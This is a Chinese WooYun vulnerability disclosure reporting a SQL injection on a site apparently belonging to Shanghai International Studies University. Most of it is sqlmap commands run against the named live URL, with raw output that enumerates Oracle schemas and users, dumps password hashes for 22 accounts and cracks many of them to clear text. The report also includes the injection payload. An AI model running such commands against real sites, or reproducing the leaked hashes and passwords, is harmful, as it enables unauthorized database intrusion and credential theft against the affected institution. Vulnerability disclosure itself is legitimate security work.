乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-27: 细节已通知厂商并且等待厂商处理中 2016-02-01: 厂商已经主动忽略漏洞,细节向公众公开
RT 上海外国语大学某站点存在SQL注入(已解密hash)
测试的时候发现上海外国语大学某站存在注入注入点为 http://www.sinofltt.com/swpx/indexActivity_activityInfo.action?activity.id=202
sqlmap 跑
➜~» sqlmap -u 'http://www.sinofltt.com/swpx/indexActivity_activityInfo.action?activity.id=202' -v 1 --dbs --batch [22:00:22] sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net[*] starting at: 22:00:30[22:00:30] [INFO] using '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session' as session file[22:00:30] [INFO] resuming injection data from session file[22:00:30] [INFO] resuming back-end DBMS 'oracle' from session file[22:00:31] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: activity.id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: activity.id=202' AND 3416=3416 AND 'euuT'='euuT---[22:00:32] [INFO] the back-end DBMS is Oracleweb application technology: Nginx, JSPback-end DBMS: Oracle[22:00:32] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[22:00:32] [INFO] fetching database (schema) names[22:00:32] [INFO] fetching number of databases[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': 16[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': CTXSYS[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': DBSNMP[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': DMSYS[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': EXFSYS[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': MDSYS[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': OLAPSYS[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': ORDSYS[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': OUTLN[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SCOTT[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SWPX[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SYS[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SYSMAN[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SYSTEM[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': TSMSYS[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': WMSYS[22:00:32] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': XDBavailable databases [16]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SWPX[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB[22:00:32] [INFO] Fetched data logged to text files under '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com'[*] shutting down at: 22:00:32
跑users
sqlmap -u 'http://www.sinofltt.com/swpx/indexActivity_activityInfo.action?activity.id=202' -v 1 --users --batch [22:00:32] sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net[*] starting at: 22:00:41[22:00:41] [INFO] using '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session' as session file[22:00:41] [INFO] resuming injection data from session file[22:00:41] [INFO] resuming back-end DBMS 'oracle' from session file[22:00:41] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: activity.id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: activity.id=202' AND 3416=3416 AND 'euuT'='euuT---[22:00:41] [INFO] the back-end DBMS is Oracleweb application technology: Nginx, JSPback-end DBMS: Oracle[22:00:41] [INFO] fetching database users[22:00:41] [INFO] fetching number of database users[22:00:41] [INFO] retrieved: 22[22:00:50] [INFO] retrieved: SWPX[22:01:13] [INFO] retrieved: SCOTT[22:01:44] [INFO] retrieved: MGMT_VIEW[22:02:26] [INFO] retrieved: MDDATA[22:03:07] [INFO] retrieved: SYSMAN[22:03:47] [INFO] retrieved: MDSYS[22:04:16] [INFO] retrieved: SI_INFORMTN_SCHEMA[22:05:38] [INFO] retrieved: ORDPLUGINS[22:06:21] [INFO] retrieved: ORDSYS[22:06:38] [INFO] retrieved: OLAPSYS[22:07:03] [INFO] retrieved: ANONYMOUS[22:07:36] [INFO] retrieved: XDB[22:07:53] [INFO] retrieved: CTXSYS[22:08:20] [INFO] retrieved: EXFSYS[22:08:39] [INFO] retrieved: WMSYS[22:08:59] [INFO] retrieved: DBSNMP[22:09:23] [INFO] retrieved: TSMSYS[22:09:52] [INFO] retrieved: DMSYS[22:10:08] [INFO] retrieved: DIP[22:10:26] [INFO] retrieved: OUTLN[22:10:56] [INFO] retrieved: SYSTEM[22:11:23] [INFO] retrieved: SYSdatabase management system users [22]:[*] ANONYMOUS[*] CTXSYS[*] DBSNMP[*] DIP[*] DMSYS[*] EXFSYS[*] MDDATA[*] MDSYS[*] MGMT_VIEW[*] OLAPSYS[*] ORDPLUGINS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SI_INFORMTN_SCHEMA[*] SWPX[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB[22:11:34] [INFO] Fetched data logged to text files under '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com'
跑password
sqlmap -u 'http://www.sinofltt.com/swpx/indexActivity_activityInfo.action?activity.id=202' -v 1 --password --batch [22:11:34] sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net[*] starting at: 22:12:22[22:12:22] [INFO] using '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session' as session file[22:12:22] [INFO] resuming injection data from session file[22:12:22] [INFO] resuming back-end DBMS 'oracle' from session file[22:12:22] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: activity.id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: activity.id=202' AND 3416=3416 AND 'euuT'='euuT---[22:12:23] [INFO] the back-end DBMS is Oracleweb application technology: Nginx, JSPback-end DBMS: Oracle[22:12:23] [INFO] fetching database users password hashes[22:12:23] [INFO] fetching database users[22:12:23] [INFO] fetching number of database users[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': 22[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SWPX[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SCOTT[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': MGMT_VIEW[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': MDDATA[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SYSMAN[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': MDSYS[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SI_INFORMTN_SCHEMA[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': ORDPLUGINS[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': ORDSYS[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': OLAPSYS[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': ANONYMOUS[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': XDB[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': CTXSYS[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': EXFSYS[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': WMSYS[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': DBSNMP[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': TSMSYS[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': DMSYS[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': DIP[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': OUTLN[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SYSTEM[22:12:23] [INFO] read from file '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com/session': SYS[22:12:23] [INFO] fetching number of password hashes for user 'SWPX'[22:12:23] [INFO] retrieved: 1[22:12:24] [INFO] fetching password hashes for user 'SWPX'[22:12:24] [INFO] retrieved: C0EB0101BE6122EE[22:13:18] [INFO] fetching number of password hashes for user 'SCOTT'[22:13:18] [INFO] retrieved: 1[22:13:22] [INFO] fetching password hashes for user 'SCOTT'[22:13:22] [INFO] retrieved: F894844C34402B67[22:14:29] [INFO] fetching number of password hashes for user 'MGMT_VIEW'[22:14:29] [INFO] retrieved: 1[22:14:31] [INFO] fetching password hashes for user 'MGMT_VIEW'[22:14:31] [INFO] retrieved: 4F538DF5F344F348[22:15:32] [INFO] fetching number of password hashes for user 'MDDATA'[22:15:32] [INFO] retrieved: 1[22:15:35] [INFO] fetching password hashes for user 'MDDATA'[22:15:35] [INFO] retrieved: DF02A496267DEE66[22:16:46] [INFO] fetching number of password hashes for user 'SYSMAN'[22:16:46] [INFO] retrieved: 1[22:16:48] [INFO] fetching password hashes for user 'SYSMAN'[22:16:48] [INFO] retrieved: A7098D3C71992379[22:17:38] [INFO] fetching number of password hashes for user 'MDSYS'[22:17:38] [INFO] retrieved: 1[22:17:40] [INFO] fetching password hashes for user 'MDSYS'[22:17:40] [INFO] retrieved: 72979A94BAD2AF[22:18:57] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request80[22:19:09] [INFO] fetching number of password hashes for user 'SI_INFORMTN_SCHEMA'[22:19:09] [INFO] retrieved: 1[22:19:12] [INFO] fetching password hashes for user 'SI_INFORMTN_SCHEMA'[22:19:12] [INFO] retrieved: 84B8CBCA4D477FA3[22:20:01] [INFO] fetching number of password hashes for user 'ORDPLUGINS'[22:20:01] [INFO] retrieved: 1[22:20:02] [INFO] fetching password hashes for user 'ORDPLUGINS'[22:20:02] [INFO] retrieved: 88A2B2C183431F00[22:20:41] [INFO] fetching number of password hashes for user 'ORDSYS'[22:20:41] [INFO] retrieved: 1[22:20:43] [INFO] fetching password hashes for user 'ORDSYS'[22:20:43] [INFO] retrieved: 7EFA02EC7EA6B86F[22:21:36] [INFO] fetching number of password hashes for user 'OLAPSYS'[22:21:36] [INFO] retrieved: 1[22:21:37] [INFO] fetching password hashes for user 'OLAPSYS'[22:21:37] [INFO] retrieved: 3FB8EF9DB538647C[22:22:32] [INFO] fetching number of password hashes for user 'ANONYMOUS'[22:22:32] [INFO] retrieved: 1[22:22:34] [INFO] fetching password hashes for user 'ANONYMOUS'[22:22:34] [INFO] retrieved: anonymous[22:23:23] [INFO] fetching number of password hashes for user 'XDB'[22:23:23] [INFO] retrieved: 1[22:23:28] [INFO] fetching password hashes for user 'XDB'[22:23:28] [INFO] retrieved: 88D8364765FCE6AF[22:24:31] [INFO] fetching number of password hashes for user 'CTXSYS'[22:24:31] [INFO] retrieved: 1[22:24:37] [INFO] fetching password hashes for user 'CTXSYS'[22:24:37] [INFO] retrieved: 71E687F036AD56E5[22:25:31] [INFO] fetching number of password hashes for user 'EXFSYS'[22:25:31] [INFO] retrieved: 1[22:25:34] [INFO] fetching password hashes for user 'EXFSYS'[22:25:34] [INFO] retrieved: 66F4EF5650C20355[22:26:30] [INFO] fetching number of password hashes for user 'WMSYS'[22:26:30] [INFO] retrieved: 1[22:26:32] [INFO] fetching password hashes for user 'WMSYS'[22:26:32] [INFO] retrieved: 7C9BA362F8314299[22:27:28] [INFO] fetching number of password hashes for user 'DBSNMP'[22:27:28] [INFO] retrieved: 1[22:27:30] [INFO] fetching password hashes for user 'DBSNMP'[22:27:30] [INFO] retrieved: 609A39BEE92031E5[22:28:22] [INFO] fetching number of password hashes for user 'TSMSYS'[22:28:22] [INFO] retrieved: 1[22:28:26] [INFO] fetching password hashes for user 'TSMSYS'[22:28:26] [INFO] retrieved: 3DF26A8B17D0F29F[22:29:30] [INFO] fetching number of password hashes for user 'DMSYS'[22:29:30] [INFO] retrieved: 1[22:29:32] [INFO] fetching password hashes for user 'DMSYS'[22:29:32] [INFO] retrieved: BFBA5A553FD9E28A[22:30:43] [INFO] fetching number of password hashes for user 'DIP'[22:30:43] [INFO] retrieved: 1[22:30:44] [INFO] fetching password hashes for user 'DIP'[22:30:44] [INFO] retrieved: CE4A36B8E06CA59C[22:31:52] [INFO] fetching number of password hashes for user 'OUTLN'[22:31:52] [INFO] retrieved: 1[22:31:57] [INFO] fetching password hashes for user 'OUTLN'[22:31:57] [INFO] retrieved: 4A3BA55E08595C81[22:33:23] [INFO] fetching number of password hashes for user 'SYSTEM'[22:33:23] [INFO] retrieved: 1[22:33:28] [INFO] fetching password hashes for user 'SYSTEM'[22:33:28] [INFO] retrieved: 027A661910F9FB9F[22:34:28] [INFO] fetching number of password hashes for user 'SYS'[22:34:28] [INFO] retrieved: 1[22:34:29] [INFO] fetching password hashes for user 'SYS'[22:34:29] [INFO] retrieved: 2C8781D6AA6A9A0C[22:35:38] [INFO] do you want to use dictionary attack on retrieved password hashes? [Y/n/q] Y[22:35:38] [INFO] using hash method: 'oracle_old_passwd'[22:35:38] [INFO] what's the dictionary's location? [/usr/local/Cellar/sqlmap/0.9_1/libexec/txt/oracle-default-passwords.txt] /usr/local/Cellar/sqlmap/0.9_1/libexec/txt/oracle-default-passwords.txt[22:35:38] [INFO] loading dictionary from: '/usr/local/Cellar/sqlmap/0.9_1/libexec/txt/oracle-default-passwords.txt'[22:35:38] [INFO] do you want to use common password suffixes? (slow!) [y/N] N[22:35:38] [INFO] starting dictionary attack (oracle_old_passwd)[22:35:43] [INFO] found: 'ordsys' for user: 'ORDSYS'[22:35:47] [INFO] found: 'manager' for user: 'OLAPSYS'[22:35:57] [INFO] found: 'mddata' for user: 'MDDATA'[22:36:05] [INFO] found: 'si_informtn_schema' for user: 'SI_INFORMTN_SCHEMA'[22:36:06] [INFO] found: 'dip' for user: 'DIP'[22:36:16] [INFO] found: 'outln' for user: 'OUTLN'[22:36:17] [INFO] found: 'change_on_install' for user: 'XDB'[22:36:19] [INFO] found: 'dmsys' for user: 'DMSYS'[22:36:25] [INFO] found: 'change_on_install' for user: 'CTXSYS'[22:36:29] [INFO] found: 'wmsys' for user: 'WMSYS'[22:36:38] [INFO] found: 'ordplugins' for user: 'ORDPLUGINS'[22:36:39] [INFO] found: 'exfsys' for user: 'EXFSYS'[22:36:51] [INFO] found: 'mdsys' for user: 'MDSYS'[22:36:54] [INFO] found: 'tiger' for user: 'SCOTT'[22:37:00] [INFO] found: 'TSMSYS' for user: 'TSMSYS'database management system users password hashes:[*] ANONYMOUS [1]: password hash: anonymous[*] CTXSYS [1]: password hash: 71E687F036AD56E5 clear-text password: change_on_install[*] DBSNMP [1]: password hash: 609A39BEE92031E5[*] DIP [1]: password hash: CE4A36B8E06CA59C clear-text password: dip[*] DMSYS [1]: password hash: BFBA5A553FD9E28A clear-text password: dmsys[*] EXFSYS [1]: password hash: 66F4EF5650C20355 clear-text password: exfsys[*] MDDATA [1]: password hash: DF02A496267DEE66 clear-text password: mddata[*] MDSYS [1]: password hash: 72979A94BAD2AF80 clear-text password: mdsys[*] MGMT_VIEW [1]: password hash: 4F538DF5F344F348[*] OLAPSYS [1]: password hash: 3FB8EF9DB538647C clear-text password: manager[*] ORDPLUGINS [1]: password hash: 88A2B2C183431F00 clear-text password: ordplugins[*] ORDSYS [1]: password hash: 7EFA02EC7EA6B86F clear-text password: ordsys[*] OUTLN [1]: password hash: 4A3BA55E08595C81 clear-text password: outln[*] SCOTT [1]: password hash: F894844C34402B67 clear-text password: tiger[*] SI_INFORMTN_SCHEMA [1]: password hash: 84B8CBCA4D477FA3 clear-text password: si_informtn_schema[*] SWPX [1]: password hash: C0EB0101BE6122EE[*] SYS [1]: password hash: 2C8781D6AA6A9A0C[*] SYSMAN [1]: password hash: A7098D3C71992379[*] SYSTEM [1]: password hash: 027A661910F9FB9F[*] TSMSYS [1]: password hash: 3DF26A8B17D0F29F clear-text password: TSMSYS[*] WMSYS [1]: password hash: 7C9BA362F8314299 clear-text password: wmsys[*] XDB [1]: password hash: 88D8364765FCE6AF clear-text password: change_on_install[22:37:00] [INFO] Fetched data logged to text files under '/usr/local/Cellar/sqlmap/0.9_1/libexec/output/www.sinofltt.com'
就酱
fix issue
危害等级:无影响厂商忽略
忽略时间:2016-02-01 09:50
漏洞Rank:4 (WooYun评价)
暂无